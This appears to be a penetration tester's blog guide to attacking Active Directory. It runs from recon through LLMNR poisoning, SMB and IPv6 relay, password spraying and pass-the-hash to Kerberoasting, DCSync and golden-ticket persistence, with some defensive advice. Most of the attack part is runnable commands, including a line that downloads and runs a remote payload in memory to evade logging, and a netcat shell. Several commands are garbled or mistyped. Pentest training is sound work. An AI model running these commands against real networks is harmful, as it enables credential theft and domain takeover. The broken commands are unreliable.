Active Directory Overview
What is Active Directory?
Directory service developed by Microsoft to manage Windows domain networks.
Stores information related to objects, such as Computers, Users, Printers, etc.
Think about it as a phone book for Windows
Authenticates using Kerberos tickets.
Non-Windows devices, such as Linux machines, firewalls, etc. can also authenticate to Active Directory via RADIUS or LDAP.
Why Active Directory Pentest?
Active Directory is the most commonly used identity management service in the world
95% of Fortune 1000 companies implement the service in their networks.
Can be exploited without ever attacking patch-able exploits.
Instead, we abuse features, trusts, components, and more.
Physical Components
Domain Controllers
A domain controller is a server with the AD DS server role installed that has specifically been promoted to a domain controller.
Host a copy of the AD DS directory store.
Provide authentication and authorization services.
Replicate updates to other domain controllers in the domain and forest.
Allow administrative access to manage user accounts and network resource.
AD DS Data Store
The AD DS data store contains the database files and processes that store and manage directory information for users, services, and applications.
Consists of the Ntds.dit file.
Is stored by default in the %SystemRoot%\NTDS folder on all domain controllers which is accessible only through the domain controller processes and protocols.
Logical AD Components
AD DS Schema
The AD DS Schema: Defines every type of object that can be stored in the directory Enforces rules regarding object creation and configuration.
Domains
- Domains are used to group and manage objects in an organization.
Trees
A domain tree is a hierarchy of domains in AD DS.
All domains in the tree:
Share a contiguous namespace with the parent domain.
Can have additional child domains
By default create a two-way transitive trust with other domains
Forests
A forest is a collection of one or more domain trees.
share a common configuration partition
Share a common global catalog to enable searching.
Enable trusts between all domains in the forest Share the Enterprise Admins and Schema Admins groups.
Organizational Units (Ous)
OUs are Active Directory containers that can contain users, groups, computers, and other OUs.
Represent your organization hierarchically and logically.
Manage a collection of objects in a consistent way Delegate permissions to administer groups of objects.
Apply policies.
Trusts
Trusts provide a mechanism for users to gain access to resources in another domain.
Directional:
- The trust direction flows from trusting domain to the trusted domain.
Transitive
The trust relationship is extended beyond a two-domain trust to include other trusted domains.
All domains in a forest trust all other domains in the forest Trusts can extend outside the forest.
Active Directory Reconnaissance:
After getting connected into the internal network with the in-scope network range in the hand, following tools can be used to enumerate the active directory infrastructure.
Host Discovery using nmap:
nmap -sn -v 192.168.10.0/24 -oA host_discovery_scan.txt
Full port scan with nmap:
nmap -p- --min-rate 10000 -oA all_port_scan.txt 192.168.10.5
Specific ports scan with nmap:
nmap -T4 -sCV -p 139,445,389,88,53,636 -oA ad_port_scan.txt 192.168.10.5
Network mapping with nxc:
nxc smb 192.168.10.0/24
Note: You might have used the crackmapexec as your favourite swiss army knife. But, cme is no longer maintained. Thank me later & just install nxc.
So, after spending the time & having the useful goodies via recon. Let's move further into getting the initial attack vector.
Initial Attack Vectors:
LLMNR Poisoning
It is used to identify hosts when DNS fails to do so and Previously known as NBT-NS.
Key flaw is that the services utilize a user's username and NTMLV1/NTLMV2 hash when appropriately responded to.
Explotation.
Step 1: Running Responder to listen broadcast:
Sudo
responsder
-I eth0 -dw
Step 2: An event occurs including someone in the org messed up with the DNS issue ( lazy employees with the failed login attempt after having lunch).
Step 3: Get NTLMv1/NTLMv2 hashes.
Step 4: Save and cracking the hashes using hashcat:
hashcat -m <insert_hash_here> hashes.txt rockyou.txt
Quick tip: Craft your own wordlist or pray with rockyou.
Defending LLMNR Poisoning
The best defense in this case is to disable LLMNR and NBT-NS.
To disable LLMNR, select "Turn OFF Multicast Name Resolution" under Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNŠ Client in the Group Policy Editor.
To disable NBT-NS, navigate to Network Connections > Network Adapter Properties > TCP/IPV4 Properties Advanced tab > WINS tab and select "Disable NetBIOS over TCP/IP".
If a company must use or cannot disable LLMNR/NBT-NS, the best course of action is to:
Require Network Access Control.
Require strong user passwords (e.g., >14 characters in length and limit common word usage). The more complex and long the password, the harder it is for an attacker to crack the hash.
SMB Relay
Instead of cracking hashes gathered with Responder, we can instead relay those hashes to specific machines and potentially gain access as the local administrators.
To perform the successful SMB Relay attack:
SMB signing should have been disabled in the organizational internal network infrastructure.
The obtained user should be a local administrator in the multiple machines.
Explotation:
Step 1 : Gathering the smb signing enabled hosts with nmap & nxc:
nmap --script =smb2-security-mode nse -p 445 192.168.10.0/24
nxc smb 192.168.10.0/24
Step 2: Responder Configuration changes:
Editing the responder.conf ( setting SMB=off HTTP=off)
Note: By doing this we will listen via reponder, but not respond to it on the servers.
Step 3: Run Responder now:
Sudo
responsder
-I eth0 -dw
Step 4: Run the ntmlrelayx tool with the target IP range:
impacket-ntlmrelayx -tf targets.txt -smb2 support
Step 5: Someone again tries to open wrong network drive or anything that cause DNS problem.
Step 6: Results start appearing including the authentication successful of victim local admin account in other machine, dumping local sam hashes and many more.
Step 7 : Getting the shell access with the ntlmrelayx tool:
impacket-ntlmrelayx -tf targets.txt -smb2support -i
Step 8: Getting connected using the netcat:
nc 192.168.10.1 1337
Defending SMB Relay
Enable SMB Signing on all devices.
Pros: completely stops the smb relay attack.
Cons: can impact performance issues with file shares.
Disable NTLM authentication on network.
Pros: Completely stops the attack.
Cons: If kerberos stops working, windows defaults back to NTLM.
Account Tiering:
Pros: Limits domain admins to specific tasks.(e.g: only log into servers with need of Domain Admin)
Cons: Enforcing the policy may be difficult in the corporate environments.
Local Admins Restriction/Limitations:
Pros: Can Prevent alot of lateral movement.
Cons: Potential increase in the amount of service desk tickets.
IPV6 DNS Takeover
There is the network infrastructure running IPv6, but not utilizing the IPv6.Quick question in the mind , if Ipv6 is not utilized nobody is working on it’s DNS resolution.Now Attacker will sit somewhere in the networking spoofing Ipv6 DNS. ( Listening all the traffic).There is the victim machine running IPv6, but not utilizing the IPv6.Quick question in the mind , if Ipv6 is not utilized nobody is working on it’s DNS resolution.Now Attacker will sit somewhere in the networking spoofing Ipv6 DNS. ( Listening all the traffic )
In this process , the issue is an attacker can get authenticated to the domain controller. ( via LDAP, via SMB).
From this attack, we can achieve:
we can use the DC (Domain controller) to create another machine.
Now, when somebody logged into the network or use their credentials somewhere an attacker can gain access to NTLM hashes.
We can also call this a LDAP Relay.
Explotation:
Step 1: Running the mitm6 tool with fake wpad.
mitm6 -d pentest.local
Running ntlmrelayx with the given required options:
impacket-
ntmlrelayx
-6 -t -wh
fakewpad.pentest.local -l output_directory
Check the juicy results given by the tool including hashes, potential sensitive information leakage in the user descriptions.
Defending IPV6 Relay:
Ipv6 poisonings abuses the fact that windows queries for an IPv6 address even in IPv4-only environments.If you don’t use IPv6 internally the safest way to prevent mitm6 is to block DHCPv6 traffic and incoming router advertisements in windows Firewall via Group policy.
Disabling IPV6 entirely may have unwanted side effects.
Setting the following pre-defined rules to block instead of Allow prevents the attack from working:
(Inbound ) core networking- Dynamic Host Configuration Protocol for IPv6 (DHCPV6-In).
(Inbound) Core Networking- Router Advertisement ( ICMPv6-In)
(Out bound) Core Networking- Dynamic Host Configuration Protocol for Ipv6 (DHCP-Out).
If WPAD is not in use internally, disable it via group policy and disabling the win HTTP Auto Proxy svc service.
Relaying to LDAP and LDAPS can only be mitigated by enabling both LDAP signing and LDAP channel binding.
Consider Administrative users to the protected users group or making them as Account is sensitive and cannot delegated, which will prevent any implementation of that user via delegation.
Password Profiling/Spraying
Its been years doing the internal active directory assessments all i can say with my experience is most of the initial foothold into the environment is through the password spray. All you can do is grab the commonly used password from the internet or curate the wordlist based on the organization name. There are some tools out there for the help such as mentalist. I prefer to go with the manual way for curating lists such as Orgname@1234, Orgname@2024 etc. Important thing is to spray the curated password responsibly since it might lockout users PC temporarily and can be a bad idea to annoy them.
Since we are unautheticated, crafting a user list with the smb null session enabled:
nxc smb <dc_ip> -u ' ' -p ' ' --users
Crafting a user list using the guest user enabled:
nxc smb <dc_ip> -u 'aaa' -p 'aaa' --users
Manually crafting the users list combining osint andcommon naming conventions in the active directory environment (john.cena, Jcena).
Spraying one password at a time in network range using nxc:
nxc smb <ip_range> -u users_list.txt -p 'Orgname@1234' | tee out.txt
Spraying one password at a time in network range using nxc for local administrators compromise:
nxc smb <ip_range> -u users_list.txt -p 'Orgname@1234' --local-auth | tee out.txt
Checking for winrm connection through the obtained valid credentials from previous spray using nxc:
nxc winrm <ip_address> -u 'john.cena' -p 'Orgname@1234'
Establishing winrm connection using evilwinrm:
evil-winrm -i <ip_address> -u 'john.cena' -p 'Orgname@1234'
CVE checks
Lets not forgot the old good goldmines aka CVEs that can lead to quick easy wins such as zero-logon, eternalblue and so on:
- Spinning up the basic nessus scan on the in-scope IP range can identify these potential CVEs.
Post Compromise Enumeration
After getting some passwords and hashes let's perform post compromise enumeration using the tools such as powerview, bloodhound.
Common Powershell security bypass using the Invishell.
Being in the modern enterprise security environment, there can be the annoying security products such as EDR/XDR in place. However, let's assume that our environment excludes those scenarios and focus on the basic powershell security bypasses. For the basic powershell security bypass we can use Invishell.
The tool hooks the .NET assemblies (System.Management.Automation.dll and System.Core.dll) to bypass logging.
It uses a CLR Profiler API to perform the hook.
"A common language runtime (CLR) profiler is a dynamic link library (DLL) that consists of functions that receive messages from, and send messages to, the CLR by using the profiling API. The profiler DLL is loaded by the CLR at run time."
Downloading & execute the Invishell in the memory using invoke expressions (iex) in powershell: ( this will probably take care of probable system wide transcription, script block logging & AMSI):
iex (New-Object Net.WebClient).DownloadString('
https://webserver/payload.ps1
')
Post-Compromise Enumeration
- Using the powerview:
Downloading and executing the powerview in the memory using invoke expressions in the powershell:
iex (New-Object Net.WebClient).DownloadString('
https://github.com/ZeroDayLab/PowerSploit/blob/master/Recon/PowerView.ps1
')
Get current domain:
Get-Domain
Get object of another domain
Get-Domain -Domain wwe.local
Get domain SID for the current domain
Get-DomainSID
Get domain policy for the current domain
Get-DomainPolicyData (Get-DomainPolicyData).systemaccess
Get domain policy for another domain
(Get-DomainPolicyData -domain wwe.local).systemaccess
Get domain controllers for the current domain
Get-DomainController
Get domain controllers for another domain
Get-DomainController -Domain wwe.local
Get a list of users in the current domain
Get-DomainUser
Get-DomainUser -Identity john.cena
Get list of all properties for users in the current domain
Get-DomainUser -Identity john.cena -Properties *
Get-DomainUser -Properties samaccountname,logonCount
Search for a particular string in a user's attributes
Get-DomainUser -LDAPFilter "Description=built" | Select name,Description
Get a list of computers in the current domain
Get-DomainComputer | select Name
Get-DomainComputer -OperatingSystem "Server 2022"
Get all the groups in the current domain
Get-DomainGroup | select Name
Get-DomainGroup -Domain <targetdomain>
Get all groups containing the word "admin" in group name
Get-DomainGroup admin
Get all the groups in the current domain
Get-DomainGroup | select Name Get-DomainGroup -Domain <targetdomain> Get-ADGroup -Filter * | select Name Get-ADGroup -Filter * -Properties *
Get all groups containing the word "admin" in group name
Get-DomainGroup *admin* Get-ADGroup -Filter 'Name -like "*admin*"' | select Name
To get the enterprise admin group via the forest root:
Get-DomainGroup *admin* -Domain <forestname> | select name
Get all the members of the Domain Admins group
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Get the group membership for a user:
Get-DomainGroup -UserName "student1" Get-ADPrincipalGroupMembership -Identity student
List all the local groups on a machine (needs administrator privs on non-dc machines) :
Get-NetLocalGroup -ComputerName john-cenadc
Get members of the local group "Administrators" on a machine (needs administrator privs on non-dc machines) :
Get-NetLocalGroupMember -ComputerName john-cenadc -GroupName Administrators
Get actively logged users on a computer (needs local admin rights on the target)
Get-NetLoggedon -ComputerName johncena-dc
Get locally logged users on a computer (needs remote registry on the target - started by-default on server OS)
Get-LoggedonLocal -ComputerName johncena-dc
Get the last logged user on a computer (needs administrative rights and remote registry on the target)
Get-LastLoggedOn -ComputerName dcorp-adminsrv
Find shares on hosts in current domain. (Bit noisy command)
Invoke-ShareFinder -Verbose
Find sensitive files on computers in the domain
Invoke-FileFinder -Verbose
Get all fileservers of the domain
Get-NetFileServer
- Bloodhound: It is the famous tool heavily used during the post-enumeration of the active directory infrastructure.you can find the tool here.
Running sharp-hound assuming the access to the target powershell console:
powershell -ep bypass
..\
sharpHound.ps
1 Invoke-BloodHound -CollectionMethod All -Domain MARVEL.local -ZipFileName out.zip
Post-Compromise Attacks:
- Pass the hash: For this post compromise attack we have to have the NTLM hashes and passwords gained during the previous enumeration phases.
Pass the password across the domain:
nxc smb <ip_range> -u 'john.cena' -p 'johncena@123
'Pass the hash across the domain:
nxc smb <ip_range> -u 'john.cena' -H <insert_hash_here>
Pass the password to compromise local accounts:
nxc smb <ip_range> -u 'john.cena' -p “johncena@123” —local-auth
Pass the hash to compromise local accounts:
nxc smb <ip_range> -u 'john.cena' -H <<insert_password_here>> —local-auth
- GPP/ cPassword Attacks (MS14-025) :
Group Policy Preferences allowed admins to create policies using embedded credentials
These credentials were encrypted and placed in a "cPassword"
The key was accidentally released (whoops).
Patched in MS14-025, but doesn't prevent previous uses.
Obtain & decrypt the password hash from SYSVOL's Groups.xml file.
gpp-decrypt <insert_hash_here>
Now , after getting the credentials , we can try try psexec to get the shell to check for DA privilege.
- Kerberoasting :
Offline cracking of service account passwords.
The Kerberos session ticket (TGS) has a server portion which is encrypted with the password hash of service account. This makes it possible to request a ticket and do offline password attack.
Because (non-machine) service account passwords are not frequently changed, this has become a very popular attack!
Obtain the service account hash using impacket:
impacket-
GetUserSPN.py
-dc-ip -requ
est <DOMAIN/username:password> -dc-ip -request
Crack the hash using hashcat: (praying to god is must)
hashcat -m 13100 kerberoast.txt rockyou.txt
- DC-Sync Attack: Dc-sync is an attack that allows an attacker to simulate the behavior of a domain controller (DC) and retrieve password data via domain replication. At this moment, we probably have domain admin access to the active directory, now we can extract credentials from the DC without code execution on it.
Extract Credentials using impacket-secretdumps:
impacket-
secretsdump.py
<domain>/<username>:<password>@<ip_address>
Persistence:
At this phase, having Domain Admin access as an attacker there are unlimited ways that can be used to maintain persistence such as golden ticket, diamond ticket , installing backdoor, modifying ACLs and many more. Based on the real world experience, forging the golden ticket is still the go to way to maintain persistence assuming there is no detection in place.
Golden Ticket Attack:
A golden ticket is signed and encrypted by the hash of krbtgt account which makes it a valid TGT ticket.
The krbtgt user hash could be used to impersonate any user with any privileges from even a non-domain machine.
As a good practice, it is recommended to change the password of the krbtgt account twice as password history is maintained for the account.
Craft a golden ticket using impacket ticketer:
impacket-
ticketer
-nthash b18b4b218eccad1c223306ea1916885f -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain <wwe.local> -dc-ip 10.10.10.1 Administrator
With the modern EDR/XDR era active directory explotation is becoming more challenging and fun at the same times. The above explained are the most common attacks and techniques that can be a good start for any seasoned pentesters who loves to pwn the active directory.Below are the resources attached that can be add-on to your arsenal.
Thank you
Resources